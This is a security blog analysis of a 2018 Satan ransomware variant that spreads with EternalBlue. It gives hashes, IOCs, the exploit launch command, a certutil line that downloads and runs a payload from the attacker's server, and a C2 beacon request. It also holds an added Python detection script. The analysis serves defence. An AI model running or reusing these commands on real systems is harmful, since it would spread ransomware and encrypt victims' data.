Satan ransomware adds EternalBlue exploit
Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.
Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.
In this blog post we’ll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.
Analysis
First up is a file inconspicuously named “sts.exe”, which may refer to “Satan spreader”.
- MD5: 12bc52fd9da66db3e63bfb196ceb9be6
- SHA1: 4508e3442673c149b31e3fffc29cc95f834975bc
- SHA256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
- Compilation timestamp: 2018-04-14 06:33:08
- VirusTotal report: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
Figure 1 – download and extract two new files
- ms.exe has password: iamsatancryptor
- client.exe has password: abcdefghijklmn
Figure 2 – UAC prompt
Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named “Cryptor.exe”. Figure 2 shows the command line options.
Figure 3 – End of setup screen
ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit – it does not appear to use its own.
cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp
Figure 4 – Spreading attempt over SMB, port 445
down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:
cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe
This payload is also packed with PECompact 2. As usual, any database-related services and processes are stopped and killed, so that database files which would otherwise be locked by another process can be encrypted as well.
Figure 5 – Database-related processes
What’s new in this version of Satan is that the exclusion list has changed slightly – it will not encrypt files that have any of the following words in their path:
windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user
Figure 6 – Ransom note
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo
GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Connection: Keep-Alive
User-Agent: Winnet Client
Host: 198.55.107.149
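As an added example (not code from the original post or from the malware), the following Python scans log lines for the behaviours described above: certutil used as a downloader, the Fuzzbunch-style spreading command line, the dropped file locations and the token.php beacon with its "Winnet Client" User-Agent. The log lines and the 10.0.0.x addresses are constructed for the example.

```python
import re

# Constructed sample log lines (Sysmon-style process creation and a proxy
# record), made up for this example; the 10.0.0.x addresses are placeholders.
SAMPLE_LOGS = [
    "Image: C:\\Windows\\System32\\cmd.exe CommandLine: cmd.exe /c certutil.exe "
    "-urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\\sts.exe",
    "Image: C:\\ProgramData\\blue.exe CommandLine: blue.exe --TargetIp 10.0.0.5 & "
    "star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 "
    "--Function RunDLL --DllPayload down64.dll --TargetIp 10.0.0.5",
    "Image: C:\\Windows\\System32\\certutil.exe CommandLine: certutil.exe -verify root.cer",
    "Image: C:\\Program Files\\7-Zip\\7z.exe CommandLine: 7z.exe x update.zip",
    "src=10.0.0.7 GET http://198.55.107.149/data/token.php?status=ST&code=ABC123 "
    'ua="Winnet Client"',
]

RULES = {
    # certutil used as a downloader (how down64.dll fetches sts.exe)
    "certutil_download": re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*-f\s+https?://", re.I),
    # Fuzzbunch-style EternalBlue/DoublePulsar launcher flags used by ms.exe
    "eternalblue_tooling": re.compile(r"-+DllPayload\s+\S+|-+Function\s+RunDLL", re.I),
    # dropped components in the locations listed in the IOCs
    "satan_dropped_files": re.compile(r"c:[\\/](sts|cryptor)\.exe|c:[\\/]programdata[\\/](ms|client)\.exe", re.I),
    # status beacon to the C2 with the hard-coded User-Agent
    "satan_beacon": re.compile(r"/data/token\.php\?status=|winnet client", re.I),
}

def classify(line):
    """Return the names of all rules that match one log line."""
    return [name for name, rx in RULES.items() if rx.search(line)]

def scan(lines):
    """Map the index of every matching line to the rules it triggered."""
    hits = {}
    for i, line in enumerate(lines):
        matched = classify(line)
        if matched:
            hits[i] = matched
    return hits

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_LOGS).items():
        print(f"line {i}: {', '.join(rules)}")
```

The benign certutil -verify and 7-Zip lines produce no hits, which is the false-positive check worth keeping when tuning such rules.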
2017-11-20 18:35:17 UTC
For additional reading, see this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.
IOCs
- C:\sts.exe
- C:\Cryptor.exe
- C:\ProgramData\ms.exe
- C:\ProgramData\client.exe
- C:\Windows\Temp\KSession
*** This is a Security Bloggers Network syndicated blog from Blaze's Security Blog authored by Bart. Read the original post at: https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html